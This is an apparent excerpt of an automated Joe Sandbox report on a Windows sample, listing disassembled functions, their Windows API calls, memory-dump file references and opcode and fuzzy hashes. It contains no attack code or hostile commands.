                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 3164238972-1173974218
                                  • Opcode ID: f1bd0550254ba506b19346789cc770a968268281375541d1a7455bae025618b7
                                  • Instruction ID: f2f413951a7d55e7f9378367643d757f574b795ab1b1963b59b4b69c1bbc5ae7
                                  • Opcode Fuzzy Hash: f1bd0550254ba506b19346789cc770a968268281375541d1a7455bae025618b7
                                  • Instruction Fuzzy Hash: 094155719452189FDF23EFA4C981AEDB7B9AF08344F1104E6E609EF541EB34A649CB50
                                  Function 003E2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E2E1C
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003E2E4F
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003E2E84
                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E2EB6
                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E2EE0
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003E2EF1
                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E2F0B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LongWindow$MessageSend
                                  • String ID:
                                  • API String ID: 2178440468-0
                                  • Opcode ID: 714112875f003296bc1cb61cc021cbcaa3e557c4d8a7966a470f0ee414f500c6
                                  • Instruction ID: dd33f18dad9895562e444f5466277abf52181fdf75071c20bb47c66450fc0c5d
                                  • Opcode Fuzzy Hash: 714112875f003296bc1cb61cc021cbcaa3e557c4d8a7966a470f0ee414f500c6
                                  • Instruction Fuzzy Hash: 4831F8316042A49FDB228F5ADC84F6637E9EB9A710F1912A4F9409F2F1CB71AC41DB41
                                  Function 003B7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003B7769
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003B778F
                                  • SysAllocString.OLEAUT32(00000000), ref: 003B7792
                                  • SysAllocString.OLEAUT32(?), ref: 003B77B0
                                  • SysFreeString.OLEAUT32(?), ref: 003B77B9
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 003B77DE
                                  • SysAllocString.OLEAUT32(?), ref: 003B77EC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: b875e3fa6b09c1319313d55535c81c44c99108d2e06ac8120a08dc9abd284f39
                                  • Instruction ID: 127fb17c6e841352c0d04a776ecc56b45f12993592533a10a6183f1b1d835408
                                  • Opcode Fuzzy Hash: b875e3fa6b09c1319313d55535c81c44c99108d2e06ac8120a08dc9abd284f39
                                  • Instruction Fuzzy Hash: 1221B276604219AFDB12DFA8DC89CFF77ACEB49368B108125FA14DF190DA70DC428B60
                                  Function 003B77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003B7842
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003B7868
                                  • SysAllocString.OLEAUT32(00000000), ref: 003B786B
                                  • SysAllocString.OLEAUT32 ref: 003B788C
                                  • SysFreeString.OLEAUT32 ref: 003B7895
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 003B78AF
                                  • SysAllocString.OLEAUT32(?), ref: 003B78BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 9197ff1a8436ebf813dda9c49de18fc86468164ada34fe4ad60a21d7075c09dd
                                  • Instruction ID: b246c562664f7a7c93e65e3594b2ac8a5662d68bd9161d6499395544c307ca3f
                                  • Opcode Fuzzy Hash: 9197ff1a8436ebf813dda9c49de18fc86468164ada34fe4ad60a21d7075c09dd
                                  • Instruction Fuzzy Hash: C521A131608208AFDB12AFB8DC8DDEA77ECEB48364B108125FA15CB6E1D670DC41CB64
                                  Function 003C04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(0000000C), ref: 003C04F2
                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C052E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateHandlePipe
                                  • String ID: nul
                                  • API String ID: 1424370930-2873401336
                                  • Opcode ID: dae5494c4e3abd4ee9cf484b02ed6f5a391fb03d96100e39a4f60307b58cdace
                                  • Instruction ID: d52e42eb61bc308d6a814113f20428f518621aeb61ecf4d099e6416497e34114
                                  • Opcode Fuzzy Hash: dae5494c4e3abd4ee9cf484b02ed6f5a391fb03d96100e39a4f60307b58cdace
                                  • Instruction Fuzzy Hash: 24217C75504385EBDF269F29D844F9A7BA8AF46724F204A1DE8A1E62E0D7709D41CF20
                                  Function 003C05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 003C05C6
                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C0601
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateHandlePipe
                                  • String ID: nul
                                  • API String ID: 1424370930-2873401336
                                  • Opcode ID: 9062e8f25a99d86fd6581f1de121b8553607862c329c83f9c439cdaa73827e3f
                                  • Instruction ID: 7e9b7c903fd90309b25d8056ecd2f053171c177cbc98b584aa3cbd3fb65a7a56
                                  • Opcode Fuzzy Hash: 9062e8f25a99d86fd6581f1de121b8553607862c329c83f9c439cdaa73827e3f
                                  • Instruction Fuzzy Hash: 86219C35500395DBDB268F68CC44F9A77A8EF85B20F200B1DE8A1E72E0D7B09C61CB20
                                  Function 003E40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0035600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0035604C
                                    • Part of subcall function 0035600E: GetStockObject.GDI32(00000011), ref: 00356060
                                    • Part of subcall function 0035600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035606A
                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003E4112
                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003E411F
                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003E412A
                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003E4139
                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003E4145
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$CreateObjectStockWindow
                                  • String ID: Msctls_Progress32
                                  • API String ID: 1025951953-3636473452
                                  • Opcode ID: 654eee4e2fc6806943912c1fb033a2f83998377f78aacf5a0a4a982cef6cc286
                                  • Instruction ID: 0bc9537a2e9429c01cb5f26e859434037dc7314c5aef5b5d8456ee5b9ea89e9f
                                  • Opcode Fuzzy Hash: 654eee4e2fc6806943912c1fb033a2f83998377f78aacf5a0a4a982cef6cc286
                                  • Instruction Fuzzy Hash: 9511E6B11402297EEF118F65CC81EE77F5DEF08398F014210BA18A6190C7769C21DBA4
                                  Function 0038D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0038D7A3: _free.LIBCMT ref: 0038D7CC
                                  • _free.LIBCMT ref: 0038D82D
                                    • Part of subcall function 003829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000), ref: 003829DE
                                    • Part of subcall function 003829C8: GetLastError.KERNEL32(00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000,00000000), ref: 003829F0
                                  • _free.LIBCMT ref: 0038D838
                                  • _free.LIBCMT ref: 0038D843
                                  • _free.LIBCMT ref: 0038D897
                                  • _free.LIBCMT ref: 0038D8A2
                                  • _free.LIBCMT ref: 0038D8AD
                                  • _free.LIBCMT ref: 0038D8B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                  • Instruction ID: 337b712b8367b923071dccb55c3ebb5551ab371dae2cf2ebc5b8993ec287e0f2
                                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                  • Instruction Fuzzy Hash: 77110771940B04AADA23BFB0CC47FCB7BDCAF05700F5048A5F299AA4D2DB6AB5158760
                                  Function 003BDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003BDA74
                                  • LoadStringW.USER32(00000000), ref: 003BDA7B
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003BDA91
                                  • LoadStringW.USER32(00000000), ref: 003BDA98
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003BDADC
                                  Strings
                                  • %s (%d) : ==> %s: %s %s, xrefs: 003BDAB9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message
                                  • String ID: %s (%d) : ==> %s: %s %s
                                  • API String ID: 4072794657-3128320259
                                  • Opcode ID: 1f5df1a3750fb7b305ffa55503336571733a44a44d8a868488b76d18fdfae8f7
                                  • Instruction ID: 2d5cf1741adf758f286f549d7829e40a6457810c9a6e22eab61a434ebbb3ac41
                                  • Opcode Fuzzy Hash: 1f5df1a3750fb7b305ffa55503336571733a44a44d8a868488b76d18fdfae8f7
                                  • Instruction Fuzzy Hash: EE01A2F2900248BFEB129BA09DC9EEB336CEB08305F001592B746E6081E6749E858F34
                                  Function 003C096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InterlockedExchange.KERNEL32(0118BC10,0118BC10), ref: 003C097B
                                  • EnterCriticalSection.KERNEL32(0118BBF0,00000000), ref: 003C098D
                                  • TerminateThread.KERNEL32(01188DB8,000001F6), ref: 003C099B
                                  • WaitForSingleObject.KERNEL32(01188DB8,000003E8), ref: 003C09A9
                                  • CloseHandle.KERNEL32(01188DB8), ref: 003C09B8
                                  • InterlockedExchange.KERNEL32(0118BC10,000001F6), ref: 003C09C8
                                  • LeaveCriticalSection.KERNEL32(0118BBF0), ref: 003C09CF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: f07d198700dd52a1847aa0d7e9f509354e1e85c234a74bc2a70cf0e4b9e23b7d
                                  • Instruction ID: 2fcf8d65ffd58ce82f8fe83f5d1e78e201b38f3839539a4351e9dd20bc3fac83
                                  • Opcode Fuzzy Hash: f07d198700dd52a1847aa0d7e9f509354e1e85c234a74bc2a70cf0e4b9e23b7d
                                  • Instruction Fuzzy Hash: A1F01D31452642EBDB665B94EEC8BDA7A39BF01702F402515F201988A0C7749866CF90
                                  Function 003801B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                  Download Yara Rule
                                  APIs
                                  • __allrem.LIBCMT ref: 003800BA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003800D6
                                  • __allrem.LIBCMT ref: 003800ED
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0038010B
                                  • __allrem.LIBCMT ref: 00380122
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00380140
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 1992179935-0
                                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                  • Instruction ID: 782c787316663e7286e033ebb016cb1e2cacb96b28b26a12e6006db64c9390d9
                                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                  • Instruction Fuzzy Hash: 68812776A007069FE726BF68CC41B6BB3E8AF41730F25827AF455DB681EB74D9048750
                                  Function 003861FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003782D9,003782D9,?,?,?,0038644F,00000001,00000001,8BE85006), ref: 00386258
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038644F,00000001,00000001,8BE85006,?,?,?), ref: 003862DE
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003863D8
                                  • __freea.LIBCMT ref: 003863E5
                                    • Part of subcall function 00383820: RtlAllocateHeap.NTDLL(00000000,?,00421444,?,0036FDF5,?,?,0035A976,00000010,00421440,003513FC,?,003513C6,?,00351129), ref: 00383852
                                  • __freea.LIBCMT ref: 003863EE
                                  • __freea.LIBCMT ref: 00386413
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                  • String ID:
                                  • API String ID: 1414292761-0
                                  • Opcode ID: 874b6ae953e810f10107b71cd52ec9bf3d1adaa8f3d31b8bd5bde65328de6a04
                                  • Instruction ID: 0e33629425a4edc91d2b06eef06eadd5518f9562c45d9419b366167aa90174eb
                                  • Opcode Fuzzy Hash: 874b6ae953e810f10107b71cd52ec9bf3d1adaa8f3d31b8bd5bde65328de6a04
                                  • Instruction Fuzzy Hash: 0651A272600316ABDF27AF64DC82EAF77AAEB44750F1546A9FC05DA150EB74DC40C760
                                  Function 003DBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                    • Part of subcall function 003DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DB6AE,?,?), ref: 003DC9B5
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DC9F1
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DCA68
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DCA9E
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003DBCCA
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003DBD25
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003DBD6A
                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003DBD99
                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003DBDF3
                                  • RegCloseKey.ADVAPI32(?), ref: 003DBDFF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
